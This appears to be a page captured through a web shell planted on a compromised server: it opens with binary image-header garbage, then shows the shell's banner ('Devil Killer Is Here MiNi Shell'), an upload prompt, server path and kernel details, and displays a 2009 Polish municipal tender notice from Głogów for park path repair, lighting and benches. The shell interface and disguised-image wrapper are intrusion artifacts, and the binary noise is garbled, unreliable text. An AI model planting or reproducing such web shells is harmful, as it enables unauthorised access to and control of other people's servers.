JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/158510-N-2009.html

<p class="kh_header"><b>Głogów: Remont nawierzchni alejek parkowych na terenie zielonym zlokalizowanym wzdłuż Bramy Brzostowskiej, wykonanie oświetlenia skweru, podświetlenia niektórych obiektów oraz dostaw ławek parkowych i koszy na śmieci</b><br>
<b>Numer ogłoszenia: 158510 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni alejek parkowych na terenie zielonym zlokalizowanym wzdłuż Bramy Brzostowskiej, wykonanie oświetlenia skweru, podświetlenia niektórych obiektów oraz dostaw ławek parkowych i koszy na śmieci.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Zamawiający dokonał podziału przedmiotu zamówienia na 3 części:
Część I - roboty budowlane - roboty rozbiórkowe nawierzchni istniejących alejek i 
ścieżek ,ułożenie nawierzchni z nowej kostki - ok.5370 m2

Część II - roboty  elektryczne - demontaż elementów istniejącej sieci elektrycznej, rozłożenie 
                                                        sieci zasilającej, ustawienie słupów oświetleniowych i 
                                                        reflektorów podświetlających obiekty, 
Część III - dostawa i montaż 40 szt. ławek parkowych i  70 szt. koszy na śmieci. 

Szczegółowy zakres zamówienia dla Części I i II określają przedmiary robót oraz dokumentacja projektowa , dla Części III określa - załącznik Nr 8c do SIWZ ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.61-5, 45.31.61.00-6, 39.11.36.00-3, 39.22.43.40-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium:
Część I-15.000,00 zł.
Część II - 7.000,00 zł.
Na część III Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp3)	Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, roboty budowlane odpowiadające swym rodzajem robotom stanowiącym przedmiot zamówienia lub części zamówienia, na która wykonawca składa ofertę. Część I - Zamawiający za robotę podobną uzna roboty polegające na wykonaniu nawierzchni z                kostki betonowej o łącznej powierzchni co najmniej 3000 m2, Część II - Zamawiający za robotę podobną uzna robotę polegającą na wykonaniu oświetlenia                 zewnętrznego o wartości równej co najmniej  połowie wartości ceny ofertowej                   (brutto),Część III - Zamawiający za zamówienie podobne uzna dostawę ławek , koszy o wartości co                    najmniej 30.000 zł ( brutto) ,4)	Dysponują lub będą dysponować osobami  posiadającymi uprawnienia  do:Część I - do kierowania robotami budowlanymi w specjalności drogowej w zakresie                   niezbędnym do wykonania zamówienia,Część II - do kierowania robotami elektrycznymi w zakresie niezbędnym do wykonania                  zamówienia, posiadającymi aktualne zaświadczenie o przynależności do OIIB,5)	Posiadają środki finansowe w wysokości:Część I - co najmniej 300.000,00 zł lub zdolność kredytową w wysokości co najmniej                300.000,00 zł , Część II - co najmniej 150.000,00 zł lub zdolność kredytową w wysokości co najmniej                 150.000,00 zł ,Część III - co najmniej 70.000,00 zł lub zdolność kredytową w wysokości co najmniej                   70.000,00 zł ,6)	Posiadają ubezpieczenie OC w zakresie prowadzonej działalności ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania przez wykonawców warunków, o których mowa w art. 26 ust. 1 pzp żąda następujących dokumentów:1)	Formularz oferty - zał. Nr 1 do SIWZ.2)	Protokół z wizji terenu objętego zamówieniem potwierdzony przez inspektora nadzoru.3)	Kosztorys ofertowy opracowany metodą szczegółową.Uwaga !Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny.Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru kalkulację własną.4)	Harmonogram rzeczowo - finansowy 5)	Dowód wniesienia  wadium.6)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru       lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6       miesięcy przed upływem terminu składania ofert.Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.7)	Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są złożyć do wniosku:.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców, do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,.	Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy, umowę regulującą współpracę tych wykonawców.8)	Oświadczenie  o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp - zał. Nr 2 do SIWZ, 9)	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają        wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, - zgodnie z załącznikiem Nr 4 do SIWZ10)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego        oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia        Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem         podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub         zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu  -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 11)	Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie - zał Nr 4 do SIWZ. 12)	Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób        zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby        którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia          wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. Nr 4 do SIWZ, 13)	Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć podwykonawcom- zał Nr 5 do SIWZ. 
14)	Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem       wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, - zał. Nr 3 do SIWZ, 15)	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym        wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków        finansowych w wysokości co najmniej 300.000,00/150.000,00/70.000,00 - zł (odpowiednio dla odpowiedniej części zamówienia) lub zdolność kredytową wykonawcy na kwotę co najmniej 300.000,00/150.000,00/70.000,00 - zł (odpowiednio dla odpowiedniej części zamówienia) wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 16)	Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.17)	W przypadku składania oferty na Część III - opisy, zdjęcia itp. ławek i koszy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów,pok. nr 314, III p..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 09:00, miejsce: Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów, w sekretariacie pok. nr 125, I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont nawierzchni alejek parkowych na terenie zielonym zlokalizowanym wzdłuż Bramy Brzostowskiej, wykonanie oświetlenia skweru, podświetlenia niektórych obiektów oraz dostaw ławek parkowych i koszy na śmieci
I.	Roboty budowlane - wykonanie prac rozbiórkowych przy nawierzchniach i wykonanie nowych chodników,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - roboty budowlane - roboty rozbiórkowe nawierzchni istniejących alejek i 
ścieżek ,ułożenie nawierzchni z nowej kostki - ok.5370 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.61-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont nawierzchni alejek parkowych na terenie zielonym zlokalizowanym wzdłuż Bramy Brzostowskiej, wykonanie oświetlenia skweru, podświetlenia niektórych obiektów oraz dostaw ławek parkowych i koszy na śmieci
II.	Roboty elektryczne - demontaż elementów istniejącej sieci elektrycznej, rozłożenie sieci zasilającej, ustawienie słupów oświetleniowych i reflektorów podświetlających obiekty,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - roboty  elektryczne - demontaż elementów istniejącej sieci elektrycznej, rozłożenie 
                                                        sieci zasilającej, ustawienie słupów oświetleniowych i 
                                                        reflektorów podświetlających obiekty,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont nawierzchni alejek parkowych na terenie zielonym zlokalizowanym wzdłuż Bramy Brzostowskiej, wykonanie oświetlenia skweru, podświetlenia niektórych obiektów oraz dostaw ławek parkowych i koszy na śmieci
III.	Dostawa i montaż ławek parkowych i koszy na śmieci..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - dostawa i montaż 40 szt. ławek parkowych i  70 szt. koszy na śmieci..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 39.22.43.40-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com